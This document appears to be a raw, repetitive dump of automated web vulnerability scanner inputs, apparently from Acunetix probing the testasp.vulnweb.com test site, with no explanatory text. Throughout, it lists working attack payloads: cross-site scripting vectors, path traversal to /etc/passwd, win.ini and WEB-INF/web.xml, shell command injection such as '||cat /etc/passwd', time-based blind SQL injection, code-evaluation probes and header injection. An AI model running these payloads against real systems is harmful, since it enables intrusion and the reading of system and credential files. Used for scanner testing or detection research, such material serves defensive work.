lH284Hdd'

1&lt

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

"|"ld

)

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

zmHDDtef')

\xf6<img acu onmouseover=prompt(986205) //\xf6>

testasp.vulnweb.com

1

!(()&&!|*|*|

'"()

'

'

caJl0mCG'))

/etc/passwd

1

1<input autofocus onfocus=prompt(958930)>

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

^(#$!@#$)(()))******

"

1

"

1

-1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

<a href='http://www.acunetix.com'>website security</a>

1

1

1

1

||cat /etc/passwd

${@print(md5(acunetix_wvs_security_test))}

-1)

1

[url=http://www.acunetix.com]website security[/url]

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

${@print(md5(acunetix_wvs_security_test))}\

http://hitXh9xhCfaIZ.bxss.me/

&dir

1

-1))

1_3mE7E <ScRiPt >prompt(990573)</ScRiPt>

acunetix_wvs_invalid_filename

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

'&dir&'

1

ho5lst9k'

1

comments

1

1

http://www.acunetix.tst

QqiRh9n3')

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

"&dir&"

1

comments

TPu0QczG'))

file:///etc/passwd

1

1

1

1

|dir

1

1

/\../\../\../\../\../\../\../etc/passwd

1

comments/.

1'"()&%<ScRiPt >prompt(927039)</ScRiPt>

1

'"

1

'|dir

1

1

WEB-INF/web.xml

'"()&%<ScRiPt >prompt(911945)</ScRiPt>

"|dir

1

1

<!--

1

WEB-INF\web.xml

1_918698

1

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

acu8902\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8902

1

../../../../../../../../../../boot.ini

1

1

1

1

acux8811\xc0\xbez1\xc0\xbcz2a\x90bcxuca8811

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1<ScRiPt >prompt(939159)</ScRiPt>

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<script>prompt(919042)</script>

1

1

1

................windowswin.ini

1<ScRiPt >prompt(913980)</ScRiPt>

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?959645></ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<ScRiPt >prompt(939170)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<video><source onerror="javascript:prompt(934385)">

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(935524)"></g></svg>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<div style=width:expression(prompt(940725))>

response.write(9840023*9655018)

1

1

1

WEB-INF/web.xml

1<iframe src='data:text/html

&cat /etc/passwd&

'+response.write(9840023*9655018)+'

1

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF\web.xml

1<body onload=prompt(984318)>

1

../../../../../../../../../../etc/passwd

"+response.write(9840023*9655018)+"

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(912387)>

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

1

1

1

../../../../../../../../../../etc/passwd.jpg

1<img src=xyz OnErRor=prompt(942197)>

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

cat /etc/passwd

1

${100464+99255}

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<img/src=">" onerror=alert(929018)>

-1

1

`cat /etc/passwd`

1

1

1

1&n977913=v906407

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<ScRiPt%20>prompt(993991)</sCripT>

-1)

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

|cat /etc/passwd#

1

)

1

1

1some_inexistent_file_with_long_name%00.jpg

1&lt

-1))

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

'|'ld

khzyW08b'

!(()&&!|*|*|

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

\xf6<img acu onmouseover=prompt(968398) //\xf6>

1

"|"ld

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'"()

1

cPWFPCC3')

^(#$!@#$)(()))******

testasp.vulnweb.com

'

1<input autofocus onfocus=prompt(972791)>

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

/etc/passwd

1

UYYhBbm3'))

1

1

<a href='http://www.acunetix.com'>website security</a>

"

-1

1

1

'

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

[url=http://www.acunetix.com]website security[/url]

-1)

1

${@print(md5(acunetix_wvs_security_test))}

1

"

http://hitnVrNxNDQDH.bxss.me/

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1_1hIhX <ScRiPt >prompt(932468)</ScRiPt>

-1))

${@print(md5(acunetix_wvs_security_test))}\

acunetix_wvs_invalid_filename

1

1

||cat /etc/passwd

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1dPpnhS8'

1

comments

1

&dir

1

http://www.acunetix.tst

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

EMM3rKJp')

comments

'"

'&dir&'

1

1

1

file:///etc/passwd

1

1

1

TRStOtCz'))

comments/.

<!--

"&dir&"

1

/\../\../\../\../\../\../\../etc/passwd

1

1'"()&%<ScRiPt >prompt(944143)</ScRiPt>

1

1

1

|dir

1

1

1

WEB-INF/web.xml

1

'"()&%<ScRiPt >prompt(983065)</ScRiPt>

1

1

'|dir

1

WEB-INF\web.xml

1_908486

1

1

../../../../../../../../../../windows/win.ini

"|dir

1

1

1

../../../../../../../../../../boot.ini

1

1

acu4027\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca4027

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

acux7126\xc0\xbez1\xc0\xbcz2a\x90bcxuca7126

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt >prompt(982591)</ScRiPt>

1

................windowswin.ini

1

1

1

1<script>prompt(971487)</script>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(974124)</ScRiPt>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?992466></ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt >prompt(950961)</ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

response.write(9841432*9878428)

1<video><source onerror="javascript:prompt(965944)">

1

1

1

'+response.write(9841432*9878428)+'

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(936366)"></g></svg>

WEB-INF/web.xml

1

"+response.write(9841432*9878428)+"

1

1

1<div style=width:expression(prompt(913496))>

&cat /etc/passwd&

WEB-INF\web.xml

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<iframe src='data:text/html

1

../../../../../../../../../../etc/passwd

'&cat /etc/passwd&'

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

SomeCustomInjectedHeader:injected_by_wvs

1

1<body onload=prompt(995039)>

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"&cat /etc/passwd&"

1

-1

SomeCustomInjectedHeader:injected_by_wvs

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(954045)>

1

${99610+100133}

1

cat /etc/passwd

../../../../../../../../../../etc/passwd.jpg

1

-1)

1<img src=xyz OnErRor=prompt(974851)>

1

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

`cat /etc/passwd`

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1))

1&n960142=v983736

1<img/src=">" onerror=alert(906573)>

1

)

1

|cat /etc/passwd#

1some_inexistent_file_with_long_name%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

9rSpEbLv'

1<ScRiPt%20>prompt(975395)</sCripT>

1

!(()&&!|*|*|

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'|'ld

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

I2QotUYh')

^(#$!@#$)(()))******

1&lt

1

1

testasp.vulnweb.com

"|"ld

qnzxJ6Cz'))

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

\xf6<img acu onmouseover=prompt(961974) //\xf6>

'"()

1

'

1

1

-1

1<input autofocus onfocus=prompt(955340)>

1

1

/etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

"

1

'

1

-1)

<a href='http://www.acunetix.com'>website security</a>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

"

1

1

1

[url=http://www.acunetix.com]website security[/url]

-1))

http://hittGNY0kseGk.bxss.me/

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

${@print(md5(acunetix_wvs_security_test))}\

||cat /etc/passwd

1

acunetix_wvs_invalid_filename

1_0cupQ <ScRiPt >prompt(991950)</ScRiPt>

Vum1wxpV'

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

&dir

1

QXebaHpv')

1

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

http://www.acunetix.tst

'"

1

'&dir&'

1

A8AfYItT'))

comments

1

<!--

file:///etc/passwd

1

1

comments/.

1

1

1

"&dir&"

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1'"()&%<ScRiPt >prompt(906779)</ScRiPt>

WEB-INF/web.xml

1

1

|dir

1

1

'"()&%<ScRiPt >prompt(922405)</ScRiPt>

1

1

WEB-INF\web.xml

1

1

'|dir

1_929579

1

1

../../../../../../../../../../windows/win.ini

"|dir

1

1

acu2907\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2907

../../../../../../../../../../boot.ini

1

1

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

acux6637\xc0\xbez1\xc0\xbcz2a\x90bcxuca6637

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt >prompt(936602)</ScRiPt>

1

1<script>prompt(950205)</script>

1

1

................windowswin.ini

1<ScRiPt >prompt(998714)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?996397></ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<ScRiPt >prompt(925575)</ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<video><source onerror="javascript:prompt(930598)">

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(933745)"></g></svg>

1

1

response.write(9328926*9626067)

1

1<div style=width:expression(prompt(917124))>

1

1

'+response.write(9328926*9626067)+'

&cat /etc/passwd&

1<iframe src='data:text/html

1

1

1

WEB-INF/web.xml

"+response.write(9328926*9626067)+"

1<body onload=prompt(993915)>

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

'&cat /etc/passwd&'

1

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(996704)>

1

WEB-INF\web.xml

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"&cat /etc/passwd&"

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<img src=xyz OnErRor=prompt(965852)>

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

cat /etc/passwd

../../../../../../../../../../etc/passwd.jpg

1

1

1

-1

1<img/src=">" onerror=alert(969497)>

1

1

`cat /etc/passwd`

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

${100346+99362}

1

-1)

1<ScRiPt%20>prompt(945150)</sCripT>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

|cat /etc/passwd#

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

-1))

1

1some_inexistent_file_with_long_name%00.jpg

1

1&lt

/../..//../..//../..//../..//../..//etc/passwd.jpg

1&n965646=v955426

'|'ld

)

WJHDxJif'

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

\xf6<img acu onmouseover=prompt(983697) //\xf6>

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

"|"ld

!(()&&!|*|*|

testasp.vulnweb.com

J981s5W9')

1

'"()

1

1<input autofocus onfocus=prompt(900258)>

/etc/passwd

^(#$!@#$)(()))******

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

Z5yislNp'))

1

1

<a href='http://www.acunetix.com'>website security</a>

'

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

'

1

-1

1

1

1

[url=http://www.acunetix.com]website security[/url]

"

1

"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

-1)

1

http://hithanPo96LBu.bxss.me/

1

1_XodiA <ScRiPt >prompt(976027)</ScRiPt>

||cat /etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

acunetix_wvs_invalid_filename

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

-1))

1

1

1

1

1

&dir

comments

${@print(md5(acunetix_wvs_security_test))}\

vGrM0xku'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

1

http://www.acunetix.tst

'&dir&'

comments

file:///etc/passwd

1

1

yqMSpLdr')

1

comments/.

'"

1

"&dir&"

1

1

/\../\../\../\../\../\../\../etc/passwd

1'"()&%<ScRiPt >prompt(948641)</ScRiPt>

aWsmlmAa'))

1

<!--

1

|dir

1

1

'"()&%<ScRiPt >prompt(931162)</ScRiPt>

1

WEB-INF/web.xml

1

1

'|dir

1_962076

1

1

WEB-INF\web.xml

1

1

1

"|dir

acu2005\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2005

1

../../../../../../../../../../windows/win.ini

1

1

acux3839\xc0\xbez1\xc0\xbcz2a\x90bcxuca3839

1

1

1

../../../../../../../../../../boot.ini

1<ScRiPt >prompt(902550)</ScRiPt>

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1<script>prompt(933712)</script>

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(952727)</ScRiPt>

1

1

1

................windowswin.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?990952></ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(901340)</ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<video><source onerror="javascript:prompt(927226)">

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(961164)"></g></svg>

1

1

1

1<div style=width:expression(prompt(998618))>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<iframe src='data:text/html

1

1

1<body onload=prompt(982200)>

response.write(9000478*9025825)

1

1

WEB-INF/web.xml

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(909978)>

'+response.write(9000478*9025825)+'

1

1

1

WEB-INF\web.xml

1<img src=xyz OnErRor=prompt(967432)>

"+response.write(9000478*9025825)+"

1

&cat /etc/passwd&

1

1

1<img/src=">" onerror=alert(941944)>

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

'&cat /etc/passwd&'

1<ScRiPt%20>prompt(936384)</sCripT>

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

"&cat /etc/passwd&"

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1&lt

SomeCustomInjectedHeader:injected_by_wvs

1

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

../../../../../../../../../../etc/passwd.jpg

1

1

\xf6<img acu onmouseover=prompt(949476) //\xf6>

cat /etc/passwd

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

-1

1

1

1<input autofocus onfocus=prompt(932961)>

`cat /etc/passwd`

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

${99819+100473}

-1)

1

1

<a href='http://www.acunetix.com'>website security</a>

|cat /etc/passwd#

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1&n913270=v932139

-1))

1

'|'ld

[url=http://www.acunetix.com]website security[/url]

)

1some_inexistent_file_with_long_name%00.jpg

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

1_1IGfE <ScRiPt >prompt(942987)</ScRiPt>

GhWcfE4C'

"|"ld

!(()&&!|*|*|

/etc/passwd

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

h7uL0q1e')

^(#$!@#$)(()))******

'"()

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

testasp.vulnweb.com

KcuzKrBA'))

1

'

1

1

'

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1

1

"

1

1

"

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

-1)

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

${@print(md5(acunetix_wvs_security_test))}

1

1

||cat /etc/passwd

1

1

1

-1))

${@print(md5(acunetix_wvs_security_test))}\

http://hitdp10UoPKvW.bxss.me/

&dir

1

acunetix_wvs_invalid_filename

1

1

1

ACUdF0jb'

1

1

'&dir&'

1

comments

1

wVcqQpdD'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

file:///etc/passwd

1

"&dir&"

1

http://www.acunetix.tst

'"

comments

1

m8ZadxIK'

/\../\../\../\../\../\../\../etc/passwd

|dir

1

1

<!--

1'"()&%<ScRiPt >prompt(986698)</ScRiPt>

comments/.

1

DZzoT5Fl')

WEB-INF/web.xml

1

'|dir

1

1

'"()&%<ScRiPt >prompt(946989)</ScRiPt>

1

WEB-INF\web.xml

sJtaLYro'))

1

"|dir

1

1_947227

1

../../../../../../../../../../windows/win.ini

1

1

1

1

acu9426\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca9426

../../../../../../../../../../boot.ini

1

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

acux1752\xc0\xbez1\xc0\xbcz2a\x90bcxuca1752

1

1

1

1<ScRiPt >prompt(971145)</ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1<script>prompt(947267)</script>

1

................windowswin.ini

1

1<ScRiPt >prompt(961017)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?977700></ScRiPt>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt >prompt(994842)</ScRiPt>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<video><source onerror="javascript:prompt(956246)">

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(958358)"></g></svg>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<div style=width:expression(prompt(927310))>

1

1

1<iframe src='data:text/html

1

response.write(9967265*9199656)

&cat /etc/passwd&

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1<body onload=prompt(953625)>

'&cat /etc/passwd&'

WEB-INF/web.xml

'+response.write(9967265*9199656)+'

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(978389)>

WEB-INF\web.xml

"&cat /etc/passwd&"

"+response.write(9967265*9199656)+"

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1<img src=xyz OnErRor=prompt(966391)>

1

../../../../../../../../../../etc/passwd.jpg

SomeCustomInjectedHeader:injected_by_wvs

cat /etc/passwd

1

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1<img/src=">" onerror=alert(999417)>

1

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

`cat /etc/passwd`

1

1<ScRiPt%20>prompt(911096)</sCripT>

-1

${99866+100339}

1

1

1

|cat /etc/passwd#

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1&lt

-1)

1

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

'|'ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

\xf6<img acu onmouseover=prompt(913209) //\xf6>

)

1&n940552=v920834

-1))

1

1some_inexistent_file_with_long_name%00.jpg

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

"|"ld

1

1<input autofocus onfocus=prompt(994767)>

gaq5hYcR'

1

!(()&&!|*|*|

'"()

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/etc/passwd

1

<a href='http://www.acunetix.com'>website security</a>

G2tkCREz')

http://testasp.vulnweb.com/t/xss.html?%00.jpg

testasp.vulnweb.com

1

^(#$!@#$)(()))******

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

'

'

jpCJIMoe'))

[url=http://www.acunetix.com]website security[/url]

1

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

"

"

-1

1

1_Oq9PO <ScRiPt >prompt(981601)</ScRiPt>

1

http://hitXVzbrb7Poh.bxss.me/

1

${@print(md5(acunetix_wvs_security_test))}

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

||cat /etc/passwd

1

-1)

1

1

acunetix_wvs_invalid_filename

1

1

${@print(md5(acunetix_wvs_security_test))}\

-1))

&dir

1

1

1

comments

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

file:///etc/passwd

H0gmoQzI'

1

'&dir&'

http://www.acunetix.tst

1

1

comments

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1

C7VBEwm1')

"&dir&"

'"

1

comments/.

1'"()&%<ScRiPt >prompt(912257)</ScRiPt>

WEB-INF/web.xml

AmRZjkBC'))

1

<!--

|dir

1

1

1

WEB-INF\web.xml

'"()&%<ScRiPt >prompt(946510)</ScRiPt>

1

1

'|dir

1

1

1_951040

1

../../../../../../../../../../windows/win.ini

1

1

"|dir

1

1

../../../../../../../../../../boot.ini

1

acu10303\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca10303

1

1

1

../../../../../../../../../../windows/win.ini.jpg

acux9186\xc0\xbez1\xc0\xbcz2a\x90bcxuca9186

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt >prompt(996795)</ScRiPt>

1

1

................windowswin.ini

..\..\..\..\..\..\..\..\windows\win.ini

1

1<script>prompt(926370)</script>

1

1

1

1

1<ScRiPt >prompt(985294)</ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?995644></ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<ScRiPt >prompt(946657)</ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<video><source onerror="javascript:prompt(936869)">

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(901396)"></g></svg>

1

1

response.write(9645728*9291386)

1

1<div style=width:expression(prompt(990757))>

WEB-INF/web.xml

1

'+response.write(9645728*9291386)+'

1

&cat /etc/passwd&

1<iframe src='data:text/html

1

WEB-INF\web.xml

1

"+response.write(9645728*9291386)+"

1

1<body onload=prompt(936909)>

'&cat /etc/passwd&'

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(9.138),0)/*'XOR(if(now()=sysdate(),sleep(9.138),0))OR'"XOR(if(now()=sysdate(),sleep(9.138),0))OR"*/

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(932046)>

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

"&cat /etc/passwd&"

1

(select(0)from(select(sleep(9.138)))v)/*'+(select(0)from(select(sleep(9.138)))v)+'"+(select(0)from(select(sleep(9.138)))v)+"*/

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img src=xyz OnErRor=prompt(953575)>

cat /etc/passwd

-1

1

1

1

1

../../../../../../../../../../etc/passwd.jpg

1

1<img/src=">" onerror=alert(992512)>

`cat /etc/passwd`

-1)

1

1

1

${99833+100420}

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

